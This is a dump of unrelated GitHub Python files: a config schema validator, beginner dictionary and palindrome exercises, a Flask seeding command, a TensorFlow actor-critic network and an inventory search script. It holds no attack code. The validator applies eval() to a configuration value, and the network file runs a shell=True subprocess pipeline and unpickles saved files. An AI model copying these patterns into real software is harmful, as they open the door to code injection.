v.Schema(self.validate_repeat_ref_time),\n v.Optional(consts.DATASET_DELAY_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_EXPIRATION_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_EXPECT_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_SKIP_KEY, default=None): v.Schema(self.validate_skip),\n v.Optional(consts.DATASET_PING_KEY, default='PT3M'): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_FETCH_TIMEOUT_KEY, default=60): v.Schema(int),\n v.Optional(consts.DATASET_FALLBACK_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_CACHE_KEY, default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_MAX_SERVICE_LAG_KEY, 
default=None): v.Schema(self.validate_duration),\n v.Optional(consts.DATASET_TRANSFER_KEY, default=consts.ALL): v.Schema(self.validate_transfer_dataset),\n v.Optional(consts.DATASET_CLEAN_KEY, default=False): v.Schema(self.validate_boolean),\n v.Optional(consts.DATASET_TRANSFER_FORMAT_KEY, default=None): v.Schema(self.validate_transfer_format),\n v.Optional(consts.DATASET_CREDENTIALS_KEY, default={}): v.Schema(self.validate_credentials),\n\n v.Optional(\n consts.DATASET_TRANSFERS_KEY,\n default=eval(self.globals[consts.GLOBAL_TRANSFERS_KEY])\n ): v.Schema(self.validate_transfers_dir),\n\n v.Optional(\n consts.DATASET_CONCURRENT_TRANSFERS_KEY,\n default=Watcher.DEFAULT_MAX_CONCURRENT_TRANSFERS\n ): v.All(int, v.Range(min=1, max=100)),\n\n v.Optional(\n consts.DATASET_ACCEPTABLE_URIS_MISSING_KEY, default=None\n ): v.Schema(self.validate_acceptable_uris_missing)\n })\n\n _old_config_schema = v.Schema({\n v.Optional(\n consts.GLOBAL_NAME_KEY,\n default=self._pipeline_name\n ): _name_schema,\n\n v.Optional(\n consts.GLOBAL_LOGGING_KEY,\n default={\n consts.GLOBAL_LOGGING_LEVEL_KEY: consts.INFO,\n consts.GLOBAL_LOGGING_DIRECTORY_KEY: os.path.join(write_space, 'logs')\n }\n ): v.Schema({\n v.Optional(\n consts.GLOBAL_LOGGING_LEVEL_KEY,\n default=consts.INFO\n ): v.Schema(self.validate_log_level),\n\n v.Optional(\n consts.GLOBAL_LOGGING_DIRECTORY_KEY,\n default=os.path.join(write_space, 'logs')\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_LOGGING_LOGSTASH_KEY,\n default=os.getenv(\"LOGSTASH_SOCKET\")\n ): v.Schema(self.validate_logstash_host),\n }),\n\n v.Optional(\n consts.GLOBAL_SWITCHBOARDS_KEY,\n default=os.path.join(write_space, 'switchboards', self._pipeline_name)\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_TRANSFERS_KEY,\n default=os.path.join(write_space, 'transfers')\n ): v.Schema(self.validate_string),\n\n v.Optional(consts.GLOBAL_VARS_KEY): v.Schema({v.Extra: str}),\n v.Optional(consts.GLOBAL_REQ_ENVS_KEY): v.Schema([str]),\n v.Required(consts.DATASETS_KEY): v.Schema([_dataset_list_schema])\n })\n\n _new_config_schema = v.Schema({\n v.Optional(\n consts.GLOBAL_NAME_KEY,\n default=self._pipeline_name\n ): _name_schema,\n\n v.Optional(\n consts.GLOBAL_LOGGING_KEY,\n default={\n consts.GLOBAL_LOGGING_LEVEL_KEY: consts.INFO,\n consts.GLOBAL_LOGGING_DIRECTORY_KEY: os.path.join(write_space, 'logs')\n }\n ): v.Schema({\n v.Optional(\n consts.GLOBAL_LOGGING_LEVEL_KEY,\n default=consts.INFO\n ): v.Schema(self.validate_log_level),\n\n v.Optional(\n consts.GLOBAL_LOGGING_DIRECTORY_KEY,\n default=os.path.join(write_space, 'logs')\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_LOGGING_LOGSTASH_KEY,\n default=os.getenv(\"LOGSTASH_SOCKET\")\n ): v.Schema(self.validate_logstash_host),\n }),\n\n v.Optional(\n consts.GLOBAL_SWITCHBOARDS_KEY,\n default=os.path.join(write_space, 'switchboards', self._pipeline_name)\n ): v.Schema(self.validate_string),\n\n v.Optional(\n consts.GLOBAL_TRANSFERS_KEY,\n default=os.path.join(write_space, 'transfers')\n ): v.Schema(self.validate_string),\n\n v.Optional(consts.GLOBAL_VARS_KEY): v.Schema({v.Extra: str}),\n v.Optional(consts.GLOBAL_REQ_ENVS_KEY): v.Schema([str]),\n v.Optional(consts.DATASET_START_KEY, default=None): v.Schema(self.validate_start_time),\n v.Optional(consts.DATASET_STOP_KEY, default=None): v.Schema(self.validate_end_time),\n v.Optional(consts.DATASET_SEED_TIMES_KEY, default=None): v.Schema(self.validate_seed_times),\n v.Required(consts.DATASET_KEY): 
v.Schema(_dataset_single_schema),\n            v.Optional(consts.PROCESS_KEY): v.Schema(_process_schema)\n        })\n        try:\n            validated = _old_config_schema(self._raw_config_dict)\n        except Exception as e1:\n            try:\n                validated = _new_config_schema(self._raw_config_dict)\n            except Exception as e2:\n                raise ValueError(\n                    \"Depending on which configuration you are going for, \"\n                    \"one of the following is wrong:\\n\"\n                    \"Combined Dataset/Process config: {}\\n\"\n                    \"Separated Dataset/Process config: {}\".format(e1, e2)\n                )\n\n        return validated\n","repo_name":"NOAA-OWP/hydrovis","sub_path":"Source/Visualizations/aws_loosa/processing_pipeline/cli/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":32656,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"41942338074","text":"# -*- coding: utf-8 -*- \r\n# @Author: Zhangxiawei \r\n# @Date: 2023-04-26 09:42:17 \r\n# @Email: myzhangxiawei@foxmail.com \r\n# @Last Modified time: 2023-04-26 11:43:23 \r\n\r\n# 1 A simple dictionary\r\nalien_0 = {'color': 'green', 'points': 5}\r\nprint(alien_0['color'])\r\nprint(alien_0['points'])\r\n\r\n# 2 Working with dictionaries: a dictionary is a series of key-value pairs; each key is associated with a value, and you can use the key to access that value\r\n# 2-1 Accessing values in a dictionary\r\nalien_0 = {'color': 'green'}\r\nprint(alien_0['color'])\r\nalien_0 = {'color': 'green', 'points': 5}\r\nnew_points = alien_0['points']\r\nprint(f\"You just earned {new_points} points!\")\r\n# 2-2 Adding key-value pairs\r\nalien_0 = {'color': 'green', 'points': 5}\r\nprint(alien_0)\r\nalien_0['x_position'] = 0\r\nalien_0['y_position'] = 25\r\nprint(alien_0)\r\n# 2-3 Starting with an empty dictionary\r\nalien_0 = {}\r\nalien_0['color'] = 'green'\r\nalien_0['points'] = 5\r\nprint(alien_0)\r\n# 2-4 Modifying values in a dictionary\r\nalien_0 = {'color': 'green'}\r\nprint(f\"The alien is {alien_0['color']}.\")\r\nalien_0['color'] = 'yellow'\r\nprint(f\"The alien is now {alien_0['color']}.\")\r\n# Determine how far to move the alien to the right, based on its current speed.\r\nalien_0 = {'x_position': 0, 'y_position': 25, 'speed': 'medium'}\r\nprint(f\"Original position: {alien_0['x_position']}\")\r\nif alien_0['speed'] == 'slow':\r\n    x_increment = 1\r\nelif alien_0['speed'] == 'medium':\r\n    x_increment = 2\r\nelse:\r\n    x_increment = 3\r\nalien_0['x_position'] = alien_0['x_position'] + x_increment\r\nprint(f\"New position: {alien_0['x_position']}\")\r\n# 2-5 Removing key-value pairs\r\nalien_0 = {'color': 'green', 'points': 5}\r\nprint(alien_0)\r\ndel alien_0['points']\r\nprint(alien_0)\r\n# 2-6 A dictionary of similar objects\r\nfavorite_languages = {\r\n    'jen': 'python',\r\n    'sarah': 'c',\r\n    'edward': 'ruby',\r\n    'phil': 'python',\r\n}\r\nlanguage = favorite_languages['sarah'].title()\r\nprint(f\"Sarah's favorite language is {language}.\")\r\n# 2-7 Using get() to access values: the first argument specifies the key and is required;\r\n# the second argument is the value to return when the key does not exist, and is optional\r\nalien_0 = {'color': 'green', 'speed': 'slow'}\r\n# print(alien_0['points'])  KeyError: 'points'\r\npoint_value = alien_0.get('points', 'No point value assigned.')\r\nprint(point_value)\r\n\r\n# 3 Looping through a dictionary\r\n# 3-1 Looping through all key-value pairs\r\nuser_0 = {\r\n    'username': 'efermi',\r\n    'first': 'enrico',\r\n    'last': 'fermi',\r\n}\r\nfor key, value in user_0.items():\r\n    print(f\"\\nKey: {key}\")\r\n    print(f\"Value: {value}\")\r\nfor name, language in favorite_languages.items():\r\n    print(f\"{name.title()}'s favorite language is {language.title()}.\")\r\n# 3-2 Looping through all the keys in a dictionary\r\nfor name in favorite_languages.keys():\r\n    print(name.title())\r\nfriends = ['phil', 'sarah']\r\nfor name in favorite_languages.keys():\r\n    print(f\"Hi {name.title()}.\")\r\n    if name in friends:\r\n        language = favorite_languages[name].title()\r\n        print(f\"\\t{name.title()}, I see you love {language}!\")\r\n
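# Note: \"if 'erin' not in favorite_languages\" behaves the same; .keys() just makes the intent explicit.\r\n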
if 'erin' not in favorite_languages.keys():\r\n    print(\"Erin, please take our poll!\")\r\n# 3-3 Looping through a dictionary's keys in a particular order\r\nfor name in sorted(favorite_languages.keys()):\r\n    print(f\"{name.title()}, thank you for taking the poll.\")\r\n# 3-4 Looping through all values in a dictionary\r\nprint(\"The following languages have been mentioned:\")\r\nfor language in favorite_languages.values():\r\n    print(language.title())\r\n    # Use a set to remove duplicates\r\nprint(\"The following languages have been mentioned:\")\r\nfor language in set(favorite_languages.values()):\r\n    print(language.title())\r\n# Defining a set: create one directly with a pair of braces, separating the elements with commas\r\nlanguages = {'python', 'ruby', 'python', 'c'}\r\nprint(languages)\r\n# Sets and dictionaries are easy to confuse because both are defined with braces. When the braces\r\n# contain no key-value pairs, what is defined is most likely a set. Unlike lists and dictionaries,\r\n# sets do not store elements in any particular order.\r\n\r\n# 4 Nesting\r\n# 4-1 A list of dictionaries\r\nalien_0 = {'color': 'green', 'points': 5}\r\nalien_1 = {'color': 'yellow', 'points': 10}\r\nalien_2 = {'color': 'red', 'points': 15}\r\naliens = [alien_0, alien_1, alien_2]\r\nfor alien in aliens:\r\n    print(alien)\r\n# Create an empty list for storing aliens.\r\naliens = []\r\n# Make 30 green aliens.\r\nfor alien_number in range(30):\r\n    new_alien = {'color': 'green', 'points': 5, 'speed': 'slow'}\r\n    aliens.append(new_alien)\r\n# Modify the first 3 aliens.\r\nfor alien in aliens[:3]:\r\n    if alien['color'] == 'green':\r\n        alien['color'] = 'yellow'\r\n        alien['speed'] = 'medium'\r\n        alien['points'] = 10\r\n# Show the first 5 aliens.\r\nfor alien in aliens[:5]:\r\n    print(alien)\r\nprint(\"...\")\r\n# Show how many aliens have been created.\r\nprint(f\"Total number of aliens: {len(aliens)}\")\r\n# 4-2 Storing lists in a dictionary\r\npizza = {\r\n    'crust': 'thick',\r\n    'toppings': ['mushrooms', 'extra cheese'],\r\n}\r\n# Summarize the pizza that was ordered.\r\nprint(f\"You ordered a {pizza['crust']}-crust pizza with the following toppings:\")\r\nfor topping in pizza['toppings']:\r\n    print(topping)\r\nfavorite_languages = {\r\n    'jen': ['python', 'ruby'],\r\n    'sarah': ['c'],\r\n    'edward': ['ruby', 'go'],\r\n    'phil': ['python', 'haskell'],\r\n}\r\nfor name, languages in favorite_languages.items():\r\n    print(f\"\\n{name.title()}'s favorite languages are:\")\r\n    for language in languages:\r\n        print(f\"\\t{language.title()}\")\r\n# 4-3 Storing dictionaries in a dictionary\r\nusers = {\r\n    'aeinstein': {'first': 'albert', 'last': 'einstein', 'location': 'princeton', },\r\n    'mcurie': {'first': 'marie', 'last': 'curie', 'location': 'paris', },\r\n}\r\nfor username, user_info in users.items():\r\n    print(f\"\\nUsername: {username}\")\r\n    full_name = f\"{user_info['first']} {user_info['last']}\"\r\n    location = user_info['location']\r\n    print(f\"\\tFull name: {full_name.title()}\")\r\n    print(f\"\\tLocation: {location.title()}\")\r\n","repo_name":"Zhangxiawei623/PythonCrashCourse","sub_path":"BasicKnowledge/25_dictionary.py","file_name":"25_dictionary.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36108626531","text":"cars={}\ncars[\"Maruti\"]=4687\ncars[\"BMW\"]=7545\ndel cars[\"BMW\"]\n\nprint(cars)\n\nadict={\n    1:\"apple\",\n    2:\"banana\",\n    3:\"orange\",\t\n    \"year\":2020\n\t}\n# popitem() removes an arbitrary item; it must run before clear(), since an empty dict raises KeyError\nadict.popitem()\nadict.clear()\nfor x in adict:\n    print(x) \n#for y in adict:\n    \n\n","repo_name":"prikshat/CAP906","sub_path":"d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72891289362","text":"# odd/even checker operation\r\n\r\nwhile True:\r\n    angka = int(input('masukkan angka untuk mencari genap atau ganjil: '))\r\n    if angka % 2 == 0:\r\n        print('angka genap')\r\n    else:\r\n        print('angka ganjil')\r\n    lagi = input('apakah anda ingin lagi(y/t): ')\r\n    if lagi == 't':\r\n        break\r\n    elif lagi == 'y':\r\n        continue\r\n    else:\r\n        print('anda tidak memasukkan y atau t')","repo_name":"royhankamil/python-project","sub_path":"mencari ganjil genap/mencari_ganjil_genap.py","file_name":"mencari_ganjil_genap.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17434848284","text":"import sys\nfrom challenge.palindrome import Palindrome\n\ndef main():\n    input_action = sys.argv[1]\n    input_string = sys.argv[2]\n\n    if input_string is None or input_action is None:\n        raise ValueError(\"Missing inputs\")\n\n    palindrome = Palindrome()\n\n    if input_action == \"-level1\":\n        print(\n            \"Is palindrome? 
{}\".format(palindrome.is_palindrome(input_string))\n )\n elif input_action == \"-level2\":\n print(\n \"Longest palindrome: {}\".format(\n palindrome.get_longest_palindromic_string(input_string)\n )\n )\n elif input_action == \"-level3\":\n splitted, count = palindrome.get_min_splits_on_string(input_string)\n print(splitted)\n print(count)\n else:\n raise NotImplementedError\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wreighsantos/palindrome","sub_path":"challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34518661772","text":"import click\nfrom bluelog.extensions import db\nfrom bluelog.fakes import fake_admin, fake_categories, fake_comments, fake_posts\n\n\ndef register_commands(app):\n @app.cli.command()\n @click.option('--category',\n default=10,\n help='Quantity of categories, default is 10.')\n @click.option('--post',\n default=50,\n help='Quantity of posts, default is 50.')\n @click.option('--comment',\n default=500,\n help='Quantity of comments, default is 500.')\n def forge(category, post, comment):\n '''Generate the fake data'''\n\n db.drop_all()\n db.create_all()\n\n click.echo('Generating the administrator...')\n fake_admin()\n click.echo(f'Generating {category} categories...')\n fake_categories(category)\n click.echo(f'Generating {post} post...')\n fake_posts(post)\n click.echo(f'Generating {comment} comments...')\n fake_comments(comment)\n\n click.echo('Done...')","repo_name":"Myfour/Flask-Study","sub_path":"Flask-wolf/bluelog/bluelog/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38656320084","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\n#import cPickle as pickle # For python 2.7, see https://askubuntu.com/questions/742782/how-to-install-cpickle-on-python-3-4\nimport pickle\nimport copy\nimport subprocess\n\n\nfrom myUtils import lazy_property, dense, variable_summaries_history, variable_summaries_layer, variable_summaries_scalar, getActionList, getNonZeroActionList,episodeBuffer\n\n\nclass ACNet(object):\n def __init__(self, scope, config, globalAC=None, summary_writer=None):\n self.config = config\n self.globalAC = globalAC\n self.action_dim = self.config.N_A\n self.state_dim = self.config.N_S\n self.summary_writer = summary_writer\n self.is_local_net = globalAC is not None\n self.name = scope\n if scope == self.config.GLOBAL_NET_SCOPE: # get global network\n self.trial_buffers_max_size = 30\n self.best_trial_buffer = []\n self.best_trial_buffers = []\n self.best_trial_fitness = 0.0\n self.best_trial_fitnesses = []\n with tf.variable_scope(scope):\n self.state_input = tf.placeholder(shape=[None, self.state_dim, self.config.TEMPORAL_WINDOW], dtype=tf.float32, name=\"S\")\n # initialize actor-net according to different config.mode\n self.actions = self.action_get_current(reuse=True)\n self.value_get_current\n self.actor_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')\n self.critic_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')\n else:\n with tf.variable_scope(scope):\n self.state_input = tf.placeholder(shape=[None, self.state_dim, self.config.TEMPORAL_WINDOW], dtype=tf.float32)\n self.action_input = tf.placeholder(tf.float32, [None, self.action_dim])\n self.action_input_target = 
tf.placeholder(tf.float32, [None, self.action_dim])\n self.value_target = tf.placeholder(tf.float32, [None, 1])\n self.advantages = tf.placeholder(tf.float32, [None, 1])\n\n self.actions = self.action_get_current(reuse=False)\n self.value_get_current\n\n self.TD_loss\n self.TL_loss\n self.critic_loss\n self.actor_loss\n\n #Get gradients from local network using local losses\n self.actor_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')\n self.critic_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')\n self.actor_grads = tf.gradients(self.actor_loss, self.actor_params)\n self.critic_grads = tf.gradients(self.critic_loss, self.critic_params)\n\n self.optimizer_actor = tf.train.AdamOptimizer(self.config.LR_A,epsilon=1e-01)\n self.optimizer_critic = tf.train.AdagradOptimizer(self.config.LR_C)\n\n #Interact with global network\n self.pull_params\n self.pull_critic_params\n self.pull_actor_params\n self.push_params\n self.push_critic_params\n self.push_actor_params\n\n with tf.variable_scope('rewards'):\n if self.name == \"W_0\":\n tf.summary.scalar(\"mean\", tf.reduce_mean(self.value_target))\n tf.summary.histogram(\"targets\", self.value_target)\n # variable_summaries_scalar(self.value_target,self.is_local_net)\n\n if self.summary_writer is not None:\n if self.name == \"W_0\":\n self.summaries = tf.summary.merge_all()\n\n def loadBestInvid(self):\n bashCommand = \"ls -l {}/\".format(self.config.SAVE_DIR) + \" | grep 'bestOpen' | awk '{print $9}' | sed -e 's/_/ /g' | awk '{print $2}' | sed -e 's/\\./ /g' | awk '{print $1}'\"\n #print bashCommand\n stdout, _ = subprocess.Popen(bashCommand, shell=True, stdout=subprocess.PIPE).communicate()\n np.array([int(i) for i in stdout.split('\\n')[:-1]])\n\t#print '{}/bestOpenLoopActor_{}.pickle'.format(self.config.SAVE_DIR,max(np.array([int(i) for i in stdout.split('\\n')[:-1]])))\n with open('{}/bestOpenLoopActor_{}.pickle'.format(self.config.SAVE_DIR,max(np.array([int(i) for i in stdout.split('\\n')[:-1]]) )),'rb') as input_file: \n self.best_trial_buffer = pickle.load(input_file)\n self.best_trial_fitness = self.best_trial_buffer[-1][2] # Last reward is the fitness\n self.best_trial_buffers.append(self.best_trial_buffer)\n self.best_trial_fitnesses.append(self.best_trial_fitness)\n \n\n def updateInvid(self,episode_buffer, actual_fitness):\n # We want to save to file the best (open loop) invid so that it can be replayed later\n # This can be used to offline test the convergence of the actor. 
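Reloading the pickled buffer (see loadBestInvid above) replays that best rollout.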
\n        best_fitness = -10000.0\n        if(self.best_trial_fitness != 0):\n            best_fitness = self.best_trial_fitness\n\n        # We update the buffers of the less good individuals\n        if(self.best_trial_fitness != actual_fitness):\n            self.best_trial_buffers.append(copy.deepcopy(episode_buffer))\n            self.best_trial_fitnesses.append(actual_fitness)\n\n        if(actual_fitness >= best_fitness):\n            # for i in episode_buffer:\n            #     print(\"{}\".format(i[episodeBuffer.a]))\n            self.best_trial_buffer = copy.deepcopy(episode_buffer)\n            self.best_trial_fitness = actual_fitness\n            with open(r\"{}/bestOpenLoopActor_{}.pickle\".format(self.config.SAVE_DIR, self.config.GLOBAL_EP), \"wb\") as output_file:\n                pickle.dump(self.best_trial_buffer, output_file)\n\n        # If the fitness is big we flush the best direction buffer.\n        # if(actual_fitness > 1.2*best_fitness):\n        #     self.best_trial_fitnesses = []\n        #     self.best_trial_buffers = []\n        #     self.best_trial_fitnesses.append(copy.deepcopy(actual_fitness))\n        #     self.best_trial_buffers.append(episode_buffer)\n        #     return\n\n        # sort ascending by fitness; the buffers are sorted first so the two lists stay paired\n        superSort = lambda X, Y: [x for _, x in sorted(zip(Y, X), key=lambda pair: pair[0])]\n\n        self.best_trial_buffers = superSort(self.best_trial_buffers, self.best_trial_fitnesses)\n        self.best_trial_fitnesses = superSort(self.best_trial_fitnesses, self.best_trial_fitnesses)\n\n        #self.best_trial_fitnesses.reverse()\n        #self.best_trial_buffers.reverse()\n        if(len(self.best_trial_fitnesses) > self.trial_buffers_max_size):\n            self.best_trial_fitnesses.pop()\n            self.best_trial_buffers.pop()\n\n    def getBestDirection(self):\n        if(len(self.best_trial_fitnesses) < 2):\n            return []\n        best = getNonZeroActionList(self.best_trial_buffer)\n        Fbest = self.best_trial_fitness\n\n        bads = [getNonZeroActionList(buf) for buf in self.best_trial_buffers]\n        Fbads = [f for f in self.best_trial_fitnesses]\n\n        #tot = sum([(best - bad) * (Fbest - Fbad)/Fbest for Fbad, bad in zip(Fbads, bads)])[0]\n        #tot = sum([(best - bad) * (Fbest - Fbad) for Fbad, bad in zip(Fbads, bads)])[0]\n        #tot = sum([(best - bad) for Fbad, bad in zip(Fbads, bads)])[0]\n        #scale = len(Fbads)\n        tot = sum([(best - bad) * (Fbest - Fbad) for Fbad, bad in zip(Fbads, bads)])[0]\n        scale = sum([Fbest - Fbad for Fbad in Fbads]) * len(Fbads)\n        return tot / scale\n\n    @lazy_property\n    def actor_loss(self):\n        with tf.variable_scope('actor_loss'):\n            actor_loss = tf.reduce_mean(tf.square(self.TL_loss))  # *tf.reduce_sum(0.1*tf.reduce_mean(self.advantages,axis=0))\n            if self.name == \"W_0\":\n                variable_summaries_scalar(actor_loss, self.is_local_net)\n        return actor_loss\n\n    @lazy_property\n    def critic_loss(self):\n        with tf.variable_scope('critic_loss'):\n            critic_loss = tf.reduce_mean(tf.square(self.TD_loss))\n            if self.name == \"W_0\":\n                variable_summaries_scalar(critic_loss, self.is_local_net)\n        return critic_loss\n\n    @lazy_property\n    def TL_loss(self):\n        return tf.subtract(self.actions, self.action_input_target)\n\n    @lazy_property\n    def TD_loss(self):\n        return tf.subtract(self.value_target, self.value_get_current)\n\n    @lazy_property\n    def value_get_current(self):\n        with tf.variable_scope('critic'):\n            w_i = tf.random_uniform_initializer(0., 0.1)\n            b_i = tf.zeros_initializer()  # bias initializer used by the non-default branches below\n            type = self.config.CRITIC_NETWORK_TYPE\n            if type == 1:\n                with tf.variable_scope('dense1'):\n                    dense1 = dense(self.state_input, 256, [256], w_i, activation=tf.nn.relu)\n                    if self.name == \"W_0\":\n                        variable_summaries_layer(dense1, self.is_local_net)\n                with tf.variable_scope('dense2'):\n                    dense2 = dense(dense1, 1, [1], w_i, activation=None)\n                    if self.name == \"W_0\":\n                        variable_summaries_layer(dense2, self.is_local_net)\n                return dense2\n            elif 
type == 2:\n with tf.variable_scope('dense1'):\n dense1 = dense(self.state_input, 512, [512], w_i, activation=tf.nn.relu)\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('dense2'):\n dense2 = dense(dense1, 256, [256], w_i, activation=tf.nn.relu)\n variable_summaries_layer(dense2,self.is_local_net)\n with tf.variable_scope('dense3'):\n dense3 = dense(dense2, 1, [1], w_i, b_i, activation=None)\n variable_summaries_layer(dense3,self.is_local_net)\n return dense3\n else:\n with tf.variable_scope('dense1'):\n dense1 = dense(self.state_input, 128, [128], w_i, activation=tf.nn.selu)\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('dense2'):\n dense2 = dense(self.state_input, 128, [128], w_i, activation=tf.nn.selu)\n variable_summaries_layer(dense2,self.is_local_net)\n with tf.variable_scope('dense3'):\n dense3 = dense(tf.concat([dense1,dense2],axis=1), 1, [1], w_i, b_i, activation=None)\n variable_summaries_layer(dense3,self.is_local_net)\n return dense3\n\n # Note: We need 2 return value here: mu & sigma. So it is not suitable to use lazy_property.\n def action_get_current(self, reuse=False):\n # Graph shared with Value Net\n with tf.variable_scope('actor'):\n w_i = tf.initializers.glorot_normal()\n b_i = tf.zeros_initializer()\n\n if self.config.ACTOR_NETWORK_TYPE == 1:\n with tf.variable_scope('act_dense1'):\n dense1 = dense(self.state_input, 512, [512], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('act_dense2'):\n dense2 = dense(dense1, 256, [256], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense2,self.is_local_net)\n\n if not reuse and self.name == \"W_0\":\n tf.contrib.layers.summarize_activation(dense1)\n tf.contrib.layers.summarize_activation(dense2)\n with tf.variable_scope('mu'):\n mu = dense(dense2, self.action_dim, None, w_i, activation=None)\n if not reuse and self.name == \"W_0\":\n variable_summaries_history(mu,self.is_local_net)\n\n elif self.config.ACTOR_NETWORK_TYPE == 11:\n with tf.variable_scope('act_dense1'):\n dense1 = dense(self.state_input, 512, [512], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense1,self.is_local_net)\n with tf.variable_scope('act_dense2'):\n dense2 = dense(dense1, 256, [256], w_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense2,self.is_local_net)\n with tf.variable_scope('act_dense3'):\n dense3 = dense(dense2, 256, [256], w_i, b_i, activation=tf.nn.relu)\n if not reuse and self.name == \"W_0\":\n variable_summaries_layer(dense3,self.is_local_net)\n\n if not reuse and self.name == \"W_0\":\n tf.contrib.layers.summarize_activation(dense1)\n tf.contrib.layers.summarize_activation(dense2)\n tf.contrib.layers.summarize_activation(dense3)\n with tf.variable_scope('mu'):\n mu = dense(dense3, self.action_dim, None, w_i, activation=None)\n if not reuse and self.name == \"W_0\":\n variable_summaries_history(mu,self.is_local_net)\n\n else:\n raise ValueError('Network type \"{}\" not implemented, should be integer'.format(self.config.ACTOR_NETWORK_TYPE))\n return mu\n\n @lazy_property\n def pull_actor_params(self):\n pull_actor_params = [tf.assign(l_p, g_p) for g_p, l_p in zip(self.globalAC.actor_params, self.actor_params)]\n return [pull_actor_params]\n\n @lazy_property\n def pull_critic_params(self):\n pull_critic_params = [tf.assign(l_p, g_p) for 
g_p, l_p in zip(self.globalAC.critic_params, self.critic_params)]\n        return [pull_critic_params]\n\n    @lazy_property\n    def pull_params(self):\n        pull_actor_params = [tf.assign(l_p, g_p) for g_p, l_p in zip(self.globalAC.actor_params, self.actor_params)]\n        pull_critic_params = [tf.assign(l_p, g_p) for g_p, l_p in zip(self.globalAC.critic_params, self.critic_params)]\n        return [pull_actor_params, pull_critic_params]\n\n    @lazy_property\n    def push_actor_params(self):\n        push_actor_params = self.optimizer_actor.apply_gradients(zip(self.actor_grads, self.globalAC.actor_params))\n        return [push_actor_params]\n\n    @lazy_property\n    def push_critic_params(self):\n        push_critic_params = self.optimizer_critic.apply_gradients(zip(self.critic_grads, self.globalAC.critic_params))\n        return [push_critic_params]\n\n    @lazy_property\n    def push_params(self):\n        push_actor_params = self.optimizer_actor.apply_gradients(zip(self.actor_grads, self.globalAC.actor_params))\n        push_critic_params = self.optimizer_critic.apply_gradients(zip(self.critic_grads, self.globalAC.critic_params))\n        return [push_actor_params, push_critic_params]\n\n    @lazy_property\n    def sample_action(self):\n        return self.actions\n","repo_name":"NikosKokkinis/deep-rl-webots","sub_path":"biorob-rl/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":15070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6046079537","text":"\"\"\"\r\nModule for searching within the inventory\r\n\r\n\"\"\"\r\n\r\nfrom os import system\r\n\r\ninventario_path = \"txt/inventario.txt\"\r\nresults_path = \"txt/result.txt\"\r\n\r\n\r\n# Function to write into a text file\r\ndef txt(info):\r\n    with open(results_path, 'w') as result:\r\n        result.write(info)\r\n\r\n\r\n# Function to perform a general search\r\ndef bgeneral(producto):\r\n    encontrado = 0  # flag that tells us whether or not we found the product\r\n    # open the flat file where the products are stored\r\n    with open(inventario_path) as inventario:\r\n        for linea in inventario:  # for every line in the flat file\r\n            datos = linea.split(\",\")  # split the comma-separated fields of the line\r\n\r\n            
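# fields: datos[0]=name, datos[1]=code, datos[2]=price, datos[3]=stock\r\n            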
if producto == datos[0] or producto == datos[1]:  # if the product name or code matches this line\r\n                encontrado = 1  # set to 1: we found the product, so return its details\r\n                return f\"\\nNombre de producto: {datos[0]}\\nCodigo: {datos[1]}\\nPrecio: {datos[2]}\\nEn inventario: {datos[3]}\"  # return the product's name, code, price and stock\r\n\r\n    if encontrado == 0:  # if the product was never found the flag stays at 0, so report that\r\n        return \"Producto no encontrado\"\r\n\r\n\r\n# Function to search by product code\r\ndef bcodigo1(codigo):\r\n    encontrado = 0\r\n    # open the flat file where the products are stored\r\n    with open(inventario_path) as inventario:\r\n        for linea in inventario:  # for every line in the flat file\r\n            datos = linea.split(\",\")  # split each line's data into a list\r\n\r\n            if codigo == datos[1]:  # if the product code matches this line\r\n                encontrado = 1\r\n                return f\"Nombre producto: {datos[0]}\\nPrecio: {datos[2]}\\nCantidad Disponible: {datos[3]}\"  # return the product's name, price and available quantity\r\n\r\n    if encontrado == 0:\r\n        return \"Producto no encontrado\"\r\n\r\n\r\n# Price-range search function\r\ndef 